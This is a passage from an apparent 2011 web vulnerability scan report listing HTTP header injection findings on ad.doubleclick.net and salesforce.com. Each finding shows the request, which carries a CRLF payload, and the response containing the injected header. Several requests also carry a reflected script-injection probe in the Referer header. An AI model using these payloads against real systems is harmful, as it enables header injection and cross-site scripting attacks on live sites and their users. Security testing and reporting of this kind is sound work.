Path:   /adj/wn.nat.kwtv/news

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 365d7%0d%0ae3dbdb6049c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /365d7%0d%0ae3dbdb6049c/wn.nat.kwtv/news;sz=300x75;wnsz=44;tile=1;wncc=News;wnpt=S;wnpc=story;wncp=KWTV;wncid=14496495;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;kw=E05511_10004;kw=E05511_50062;kw=E05511_50085;apptype=platform;env=production;ord=86636883? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/365d7
e3dbdb6049c
/wn.nat.kwtv/news;sz=300x75;wnsz=44;tile=1;wncc=News;wnpt=S;wnpc=story;wncp=KWTV;wncid=14496495;wnad85=kwtv;wnad44=worldnow;wndomain=about: blank;kw=E05511_10004;kw=E05511_50062;kw=E05511_50085;apptype=platform;env=production;ord=86636883
Date: Fri, 22 Apr 2011 16:04:12 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.18. http://ad.doubleclick.net/adj/wn.nat.kwtv/radio07 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.nat.kwtv/radio07

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5352f%0d%0a5f8bbb61a80 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5352f%0d%0a5f8bbb61a80/wn.nat.kwtv/radio07;sz=300x75;wnsz=44;tile=1;wncc=Radio%2007;wnpt=C;wnpc=category;wncp=KWTV;wncid=192772;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;;apptype=platform;env=production;ord=58487014? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5352f
5f8bbb61a80
/wn.nat.kwtv/radio07;sz=300x75;wnsz=44;tile=1;wncc=Radio 07;wnpt=C;wnpc=category;wncp=KWTV;wncid=192772;wnad85=kwtv;wnad44=worldnow;wndomain=about: blank;;apptype=platform;env=production;ord=58487014
Date: Fri, 22 Apr 2011 15:30:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.19. http://ad.doubleclick.net/adj/wn.nat.kwtv/sales-environmental [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.nat.kwtv/sales-environmental

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4a0e3%0d%0a90648814a15 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4a0e3%0d%0a90648814a15/wn.nat.kwtv/sales-environmental;sz=300x75;wnsz=44;tile=1;wncc=Sales%20-%20Environmental;wnpt=S;wnpc=story;wncp=KWTV;wncid=5963519;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;kw=E05511_10004;kw=E05511_50062;apptype=platform;env=production;ord=51921513? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4a0e3
90648814a15
/wn.nat.kwtv/sales-environmental;sz=300x75;wnsz=44;tile=1;wncc=Sales - Environmental;wnpt=S;wnpc=story;wncp=KWTV;wncid=5963519;wnad85=kwtv;wnad44=worldnow;wndomain=about: blank;kw=E05511_10004;kw=E05511_50062;apptype=platform;env=production;ord=51921513
Date: Fri, 22 Apr 2011 16:04:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.20. http://ad.doubleclick.net/adj/wn.nat.kwtv/station2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.nat.kwtv/station2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 430c9%0d%0a639c3de1328 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /430c9%0d%0a639c3de1328/wn.nat.kwtv/station2;sz=300x75;wnsz=44;tile=1;wncc=Station%202;wnpt=C;wnpc=category;wncp=KWTV;wncid=118245;wnad85=kwtv;wnad45=kwtv;wnad44=worldnow;wndomain=about%3Ablank;;apptype=platform;env=production;ord=58285658? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/430c9
639c3de1328
/wn.nat.kwtv/station2;sz=300x75;wnsz=44;tile=1;wncc=Station 2;wnpt=C;wnpc=category;wncp=KWTV;wncid=118245;wnad85=kwtv;wnad45=kwtv;wnad44=worldnow;wndomain=about: blank;;apptype=platform;env=production;ord=58285658
Date: Fri, 22 Apr 2011 15:34:23 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.21. http://ad.doubleclick.net/adj/wn.nat.kwtv/weather [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.nat.kwtv/weather

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6ef0e%0d%0aecce4cabbe6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6ef0e%0d%0aecce4cabbe6/wn.nat.kwtv/weather;sz=300x75;wnsz=44;tile=1;wncc=Weather;wnpt=C;wnpc=weather;wncp=KWTV;wncid=198140;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;kw=E05511_10004;kw=E05511_50085;apptype=platform;env=production;ord=37923550? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6ef0e
ecce4cabbe6
/wn.nat.kwtv/weather;sz=300x75;wnsz=44;tile=1;wncc=Weather;wnpt=C;wnpc=weather;wncp=KWTV;wncid=198140;wnad85=kwtv;wnad44=worldnow;wndomain=about: blank;kw=E05511_10004;kw=E05511_50085;apptype=platform;env=production;ord=37923550
Date: Fri, 22 Apr 2011 15:53:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.22. http://www.salesforce.com/common/assets/css/styles.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/css/styles.css

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload d4838%0d%0a4aa22e57a0d was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /common/assets/css/d4838%0d%0a4aa22e57a0d?date=04.22.20114 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/css/d4838
4aa22e57a0d
/?date=04.22.20114
Date: Fri, 22 Apr 2011 15:26:22 GMT
Content-Length: 147

The URL has moved to <a href="/common/assets/css/d4838
4aa22e57a0d/?date=04.22.20114">/common/assets/css/d4838
4aa22e57a0d/?date=04.22.20114</a>

2.23. http://www.salesforce.com/common/assets/css/superfish.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/css/superfish.css

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload ebc7c%0d%0a3ed8cbad4a6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /common/assets/css/ebc7c%0d%0a3ed8cbad4a6?date=04.22.20112 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/css/ebc7c
3ed8cbad4a6
/?date=04.22.20112
Date: Fri, 22 Apr 2011 15:27:06 GMT
Content-Length: 147

The URL has moved to <a href="/common/assets/css/ebc7c
3ed8cbad4a6/?date=04.22.20112">/common/assets/css/ebc7c
3ed8cbad4a6/?date=04.22.20112</a>

2.24. http://www.salesforce.com/common/assets/js/global2.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/js/global2.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload ade59%0d%0a2fe7fd351ad was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /common/assets/js/ade59%0d%0a2fe7fd351ad?date=101221 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/js/ade59
2fe7fd351ad
/?date=101221
Date: Fri, 22 Apr 2011 15:26:11 GMT
Content-Length: 135

The URL has moved to <a href="/common/assets/js/ade59
2fe7fd351ad/?date=101221">/common/assets/js/ade59
2fe7fd351ad/?date=101221</a>

2.25. http://www.salesforce.com/common/assets/js/opinionlab/oo_engine.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/js/opinionlab/oo_engine.js

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 8d5c8%0d%0af90c3e609ab was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /common/assets/js/opinionlab/8d5c8%0d%0af90c3e609ab?date=110127 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751; fsr.a=1303485890905; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/js/opinionlab/8d5c8
f90c3e609ab
/?date=110127
Date: Fri, 22 Apr 2011 15:28:55 GMT
Content-Length: 157

The URL has moved to <a href="/common/assets/js/opinionlab/8d5c8
f90c3e609ab/?date=110127">/common/assets/js/opinionlab/8d5c8
f90c3e609ab/?date=110127</a>

2.26. http://www.salesforce.com/common/assets/js/sf.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/js/sf.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload b2e21%0d%0adf42fdeb731 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /common/assets/js/b2e21%0d%0adf42fdeb731?date=04.22.20112 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/js/b2e21
df42fdeb731
/?date=04.22.20112
Date: Fri, 22 Apr 2011 15:26:18 GMT
Content-Length: 145

The URL has moved to <a href="/common/assets/js/b2e21
df42fdeb731/?date=04.22.20112">/common/assets/js/b2e21
df42fdeb731/?date=04.22.20112</a>

2.27. http://www.salesforce.com/common/assets/js/supersubs.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/js/supersubs.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 8db5a%0d%0a1d929d68ca9 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /common/assets/js/8db5a%0d%0a1d929d68ca9?date=04.22.20112 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/js/8db5a
1d929d68ca9
/?date=04.22.20112
Date: Fri, 22 Apr 2011 15:27:05 GMT
Content-Length: 145

The URL has moved to <a href="/common/assets/js/8db5a
1d929d68ca9/?date=04.22.20112">/common/assets/js/8db5a
1d929d68ca9/?date=04.22.20112</a>

2.28. http://www.salesforce.com/common/assets/thirdparty/foresee/foresee-surveydef.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/thirdparty/foresee/foresee-surveydef.js

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 1b145%0d%0a969e86ca9d3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /common/assets/thirdparty/foresee/1b145%0d%0a969e86ca9d3 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]; fsr.a=1303485904836; s_sess=%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B%20s_ppv%3D62%257C0%3B

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/thirdparty/foresee/1b145
969e86ca9d3
/
Date: Fri, 22 Apr 2011 15:30:37 GMT
Content-Length: 143

The URL has moved to <a href="/common/assets/thirdparty/foresee/1b145
969e86ca9d3/">/common/assets/thirdparty/foresee/1b145
969e86ca9d3/</a>

2.29. http://www.salesforce.com/common/assets/thirdparty/foresee/transport5.swf [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/thirdparty/foresee/transport5.swf

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload a931d%0d%0afc491a3fb54 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /common/assets/thirdparty/foresee/a931d%0d%0afc491a3fb54 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; fsr.a=1303485893905; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_sess=%20s_ppv%3D0%3B%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/thirdparty/foresee/a931d
fc491a3fb54
/
Date: Fri, 22 Apr 2011 15:29:58 GMT
Content-Length: 143

The URL has moved to <a href="/common/assets/thirdparty/foresee/a931d
fc491a3fb54/">/common/assets/thirdparty/foresee/a931d
fc491a3fb54/</a>

2.30. http://www.salesforce.com/common/assets/thirdparty/omniture/s_code3.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/thirdparty/omniture/s_code3.js

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload f1f38%0d%0a9190a9037c9 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /common/assets/thirdparty/omniture/f1f38%0d%0a9190a9037c9?date=101221 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751; fsr.a=1303485890905; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/thirdparty/omniture/f1f38
9190a9037c9
/?date=101221
Date: Fri, 22 Apr 2011 15:27:53 GMT
Content-Length: 169

The URL has moved to <a href="/common/assets/thirdparty/omniture/f1f38
9190a9037c9/?date=101221">/common/assets/thirdparty/omniture/f1f38
9190a9037c9/?date=101221</a>

2.31. http://www.salesforce.com/common/assets/thirdparty/pixels/pixel-manager.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /common/assets/thirdparty/pixels/pixel-manager.js

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 1e04a%0d%0a284c4d986bb was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /common/assets/thirdparty/pixels/1e04a%0d%0a284c4d986bb?date=101221 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751; fsr.a=1303485890905; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /common/assets/thirdparty/pixels/1e04a
284c4d986bb
/?date=101221
Date: Fri, 22 Apr 2011 15:28:58 GMT
Content-Length: 165

The URL has moved to <a href="/common/assets/thirdparty/pixels/1e04a
284c4d986bb/?date=101221">/common/assets/thirdparty/pixels/1e04a
284c4d986bb/?date=101221</a>

2.32. http://www.salesforce.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload def3f%0d%0af5e9ff33902 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /def3f%0d%0af5e9ff33902 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]; fsr.a=1303485904836; 